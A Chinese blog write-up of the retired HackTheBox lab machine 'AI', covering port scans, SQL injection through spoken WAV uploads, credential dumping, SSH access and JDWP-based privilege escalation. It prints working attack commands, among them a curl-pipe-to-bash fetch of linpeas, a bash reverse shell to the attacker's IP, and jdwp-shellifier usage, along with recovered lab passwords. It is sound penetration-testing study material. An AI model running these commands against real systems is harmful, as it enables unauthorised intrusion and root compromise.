美文网首页ctf
hackthebox-AI——有趣的sql+JDWPgetshe

hackthebox-AI——有趣的sql+JDWPgetshe

作者: byc_404 | 来源:发表于2020-01-29 13:37 被阅读0次

终于又等到hackthebox更新退役靶机了,这次的靶机是AI。因为比较有意思所以来记录下。不过过程并非一帆风顺。其中还遇到靶机磁盘写满导致无法写入文件的事。删了半天才想起来要重设靶机......

跟上次一样参考了下大神的视频https://www.youtube.com/watch?v=7n7YRntu3bc&t=1391s视频真的非常良心。

(这次做之前更新kali虚拟机,又把自己的虚拟机弄死机了......好在现在不那么容易整体炸掉,倒是kali的界面越更新越舒适,挺不错的)


AI

本机ip:10.10.15.60

靶机ip:10.10.10.163

首先第一步当然是探测端口了

nmap -sC -sV -oA ai 10.10.10.163
nmap

发现有22与80端口开放。既然有http服务,那就尝试直接访问吧。
有一个主页面。同时也发现了其他php文件,唯一比较有意思的就是下面这个ai.php页面,有一个文件上传点。

ai

但是很奇怪。居然是.wavfile。通常我所知道的文件上传点也就图片马或者phar反序列化或者其他类型的getshell。而它提示的drop your query using wav file.似乎是在说明我们可以进行查询操作。

那么首先随便传一个test.php上去。内容随意。发现没有回显。


test

看来是要wav的音频文件了。使用音频文件执行查询,这点真的难以弄懂。那么在尝试弄清漏洞类型之前先来目录爆破一下,看有没有什么别的信息:

gobuster dir -u http://10.10.10.163 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

基于这里都是php,我们在gobuster后着重加上-x php进行筛选。
解果大致如下:

/index.php (Status: 200)
/contact.php (Status: 200)
/about.php (Status: 200)
/images (Status: 301)
/uploads (Status: 301)
/db.php (Status:301)
/intelligence.php(Status: 200)
/ai.php(Status: 200)

其中ai.php等等都是主页面就提供了的。新发现的页面包括intelligence.phpdb.php。上传跟图片界面我们都没有权限进去。那么访问下唯一可以访问的intelligence.php

intelligence.php

发现了这个页面。似乎存在着词语的替换关系。从表的右列中我们不难找到一些熟悉的符号--union,#,---,Schema等等。这些都是常常出现在sql注入中的符号。结合我们还爆破出了db.php,可以猜想是否有sql注入的漏洞呢?

答案是正确的。而且脑洞大开的是:我们要用语言转成音频文件上传来进行注入。这也许就是这个AI靶机的名字所在吧。

首先google linux say command, 发现有这样的一个软件。叫做festival。

apt-get install festival

使用它其中一个叫text2wave的就能将语句转成语音文件。比如用下管道符,生成一个test.wav,内容为hello。

echo "Hello"| text2wave -o test.wav
test

尝试听下这个音频,发现是个男低音(也许是机器合成音?)然后再次尝试上传


hello

发现input有结果,那么就尝试下翻译成英文来sql注入吧。
(这点对非英语母语的国家的人应该非常不友好......毕竟有些偏门的括号之类的英文我也不太熟)

( openparenthesis 左括号
) closeparenthesis 右括号
- hyphen   连字符

基于一开始还探测到的intelligence.php中有些字符对应关系,不难想到我们需要使用那张表来绕过注入
比如我的尝试payload

' union select database()---

需要换作

open single quote, join select , database open parenthesis close parenthesis comment database

再重复上面生成test.wav的操作,就可以上传注入。


database

基于hackthebox易得user的尿性,可以猜出一张users表然后爆出username跟password

'union select username from user---
open single quote, join , select , username from users comment database
open single quote, join , select , password from users comment database
username
password

显然,我们的http页面并没有什么让我们登录进去的方法或页面。基于之前的端口探测发现有ssh开放,不妨尝试ssh登录


ssh login

成功登陆。并且user.txt就在当前目录下。

之后就是常规提权的过程了。

这里开始可能会想到之前没成功访问的db.php,在/var/www/html中爆出内容

mysql
可知username为dbuser,password为toor
进入mysql可用的就多了。(然而我进去的时候库被别人删了......)实际上可以爆出之前alexa所在user表的内容中
username:root
password:H,Sq9t6}a<)?q931

但是ssh登录并不成功。mysql这条路走不通。

众所周知,发现提权的漏洞点并不是一件容易的事,尤其是对我这样的小白而言。所以,我从dalao视频那发现了一个很厉害的脚本可以解决我自己的漏洞认知问题。
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
在靶机上使用其中的linpeas.sh,脚本就会自动分析可能提权的漏洞点。着实解决不少问题。不过通常结果又臭又长,可能需要耐心找一找。
具体方法也很简单,本机git clone好后,起一个python监听(默认8000端口)

python -m SimpleHTTPServer

在靶机上直接curl后执行就好了

curl 10.10.15.60:8000/linpeas.sh | bash

这里从linpeas.sh的结果中可以发现一个JDWP的点被标红了。
那么jdwp是什么呢?我们搜索一下

JDWP(Java DEbugger Wire Protocol):即Java调试线协议,是一个为Java调试而设计的通讯交互协议,它定义了调试器和被调试程序之间传递的信息的格式。说白了就是JVM或者类JVM的虚拟机都支持一种协议,通过该协议,Debugger 端可以和 target VM 通信,可以获取目标 VM的包括类、对象、线程等信息

而这是有漏洞利用的。比如知道创宇上的
https://www.seebug.org/vuldb/ssvid-89216

等等,都是jdwp的代码执行漏洞。那么我们接下来就用这个漏洞,尝试拿到root权限。
首先确定使用的工具
https://github.com/IOActive/jdwp-shellifier

jdwp-shellifier(上面几个漏洞报告都是用的这个工具)之后考虑我们要执行的命令,当然是拿到root shell比较好。所以先在alexa的靶机的tmp目录下放一个反弹shell的脚本test.sh内容如下:

#!/bin/bash
bash -c 'bash -i >& /dev/tcp/10.10.15.60/9002 0>&1'

然后给其执行的权限

chmod +x test.sh

调用时只需:

./test.sh

先本机监听下,没有问题,可以弹到alexa的shell。

接下来用到一个新学到的大招:端口转发。我们都知道,每次ssh登录这一靶机都要用户密码,十分麻烦。而且将要利用的jdwp是java的debug功能,据说操作时十分容易断开。那有没有什么方法可以本机处理这个jdwp呢?答案就是端口转发。原本自己以为十分复杂,但实际上并非如此。

首先在靶机上确认jdwp是运行在8000端口的。
那么我先进入tomcat的目录,按下~C将直接进入ssh,然后将其转到localhost来研究

-L 8000:localhost:8000
a13.PNG

这时我们在本机上使用

ss -lntp

查看主机监听的端口。就会发现8000端口处于监听状态了,user是ssh。我们也可以用同样的方法转发tomcat的8009和8080端口到本地,这样我们就能直接浏览器访问localhost:8080来分析tomcat(当然这里没有什么帮助)

当然,这里转发到本地本来只是方便调试,因为可以直接在本地手动利用jdwp的漏洞,找到一个breakpoint用debug功能来执行命令。但是这方面实在不熟(java白学了),所以还是直接利用上面的脚本舒服啊。
shellifier用法

python jdwp-shellifier.py -t 目标主机ip -p jdwp运行端口 --cmd "Your Command"

这里我们直接

python jdwp-shellifier.py -t 127.0.0.1 --break-on "java.lang.String.indexOf" --cmd "/tmp/test.sh"

因为转发了ip,端口所以使用的ip是本地。而break-on这点方便找出可以利用的断点。最后的cmd执行我们的反弹shell。
本机再度监听后执行这个脚本


root

成功反弹shell到本机。即可拿到root.txt

感觉提权这方面自己还是不太熟悉,可能因为大部分ctf比赛注重的也只是getshell层面上的吧,之后的操作还要多加了解知识学习啊。

相关文章

  • hackthebox-AI——有趣的sql+JDWPgetshe

    终于又等到hackthebox更新退役靶机了,这次的靶机是AI。因为比较有意思所以来记录下。不过过程并非一帆风顺。...

  • 有趣的🚄,有趣的👫,有趣的👴

    一大早爬起来赶高铁去苏州,今天要见高中同学,做他的访问专辑。上海到苏州的高铁运营时间仅半个小时,而候车乘车这...

  • 有趣有趣

    。 。 。 。 。

  • 有趣有趣

  • 有趣,有趣

    最近在简书上认识了一个小屁孩,感受了一把年轻人充满活力的光辉照耀。被人误会成她的同龄人,也是有趣的体验,我想大概我...

  • 有趣的人,有趣的生活😄

    2018年7月7日,星期六,阴天 奇葩的一天,奇葩事多! 每一天,都会有不一样的经历。 别人说,每一段经历都会教会...

  • 有趣的人,有趣的对话

    -学历,你觉得重要吗? -看情况吧,我觉得还是重要的。 -出来工作两年,和学习两年,完全不一样吧,前者难道不是赚了...

  • 有趣的灵魂有趣的人

    有趣的灵魂有趣的人 有人说,好看的皮囊千篇一律,有趣的灵魂万里挑一。其实,任何美好的事物我都是喜欢的,最起...

  • 有趣的人,有趣的生活

    生活无非是柴米油盐酱醋茶,一切琐碎的事连在一起组合起来。从出生到死亡也就这么些岁月,那么些时光,怎么可以不找个...

  • “有趣的测量”有趣乎

    学习《有趣的测量》,内容是“计算不规则物体的体积”。 很早的计划是:准备好器材,必须让学生亲自测量一次,经历液面升...

网友评论

    本文标题:hackthebox-AI——有趣的sql+JDWPgetshe

    本文链接:https://www.haomeiwen.com/subject/olumthtx.html